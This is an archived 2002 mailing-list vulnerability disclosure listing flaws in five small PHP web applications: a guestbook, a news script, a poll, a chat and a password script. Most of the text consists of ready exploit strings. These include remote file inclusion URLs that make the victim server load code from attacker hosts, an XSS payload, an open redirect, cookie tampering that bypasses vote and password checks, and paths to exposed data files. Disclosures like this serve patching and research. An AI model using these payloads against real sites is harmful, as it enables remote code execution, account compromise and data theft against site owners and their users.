('binary' encoding is not supported, stored as-is) Product 1 : *********** Achims Guestbook 2.51 (and less?) http://www.lkcc.org:8500/index.php Problem : - Informations Disclosure Exploits : - /data/*.dat (e.g. : data.dat) - /temp/*.tmp (e.g. : ip.tmp) Product 2 : *********** InertiaNews 0.02 beta http://www.brentc.com Problem : - Require(); Exploit : - http://www.victim.com/inertianews_main.php? inews_path=http://www.site.com With http://www.site.com/inertia_sql_class.php Product 3 : *********** Pollen 1.4.1 (and less ?) http://www.phpspirit.com Problems : - Path Disclosure - Including file - Distortion of the security against the multiple votes Exploits : - pollensondage.inc.php?app_path=non-existant-path - Setcookie("pollensondage","") - pollensondage.inc.php?app_path=http://www.haxor.com with http://www.haxor.com/admin/phpext - etc ... Product 4 : *********** MyPhpChat 1 http://www.creotec.com Problems : - XSS - Redirection Exploits : - iframe.php?mynick=<script>[SCRIPT]</script> - userlist.php?ME=http://www.site.com - etc... Product 5 : *********** mcPass 1 http://www.phpforums.net Problem : -Distortion of security Exploit : - Setcookie("mcPass","AAAAA") More details in french : http://www.ifrance.com/kitetoua/tuto/5holes6.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F% 2Fwww.ifrance.com%2Fkitetoua%2Ftuto% 2F5holes6.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=% 2Flanguage_tools frog-m@n
This archive was generated by hypermail 2b30 : Mon May 27 2002 - 13:21:16 PDT